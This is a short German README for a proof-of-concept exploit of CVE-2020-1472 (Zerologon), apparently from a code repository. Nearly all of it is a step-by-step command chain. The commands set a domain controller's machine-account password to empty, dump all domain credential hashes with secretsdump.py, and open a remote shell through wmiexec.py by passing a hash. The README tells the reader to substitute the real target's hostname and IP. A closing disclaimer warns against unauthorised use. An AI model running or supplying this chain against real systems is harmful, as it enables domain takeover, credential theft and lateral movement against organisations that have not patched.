
Ein praktischer Proof-of-Concept für CVE-2020-1472 (Zerologon) unter Verwendung der Impacket-Bibliothek zur Ausnutzung der Netlogon-Schwachstelle und Durchführung nicht autorisierten Domänencontroller-Zugriffs.
Dieses Repository enthält eine aktualisierte Implementierung (2024) des Zerologon-Exploits in Kombination mit Impacket-Tools, um CVE-2020-1472 (Zerologon) auszunutzen. Der Exploit zielt auf Windows Server-Umgebungen ab, um Maschinenkontopasswörter zu manipulieren und laterale Bewegungen durchzuführen.
pip install -r requirements.txt
python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
python secretsdump.py -just-dc "tancongmang/[email protected]"
python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
WIN-C9PAHHGJN91 und 192.168.40.145 durch den tatsächlichen Hostnamen und die IP-Adresse des Ziels.Nutzen Sie dieses Tool verantwortungsvoll. Die unbefugte Nutzung dieses Tools zum Ausnutzen von Systemen ohne explizite Erlaubnis ist illegal und unethisch. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.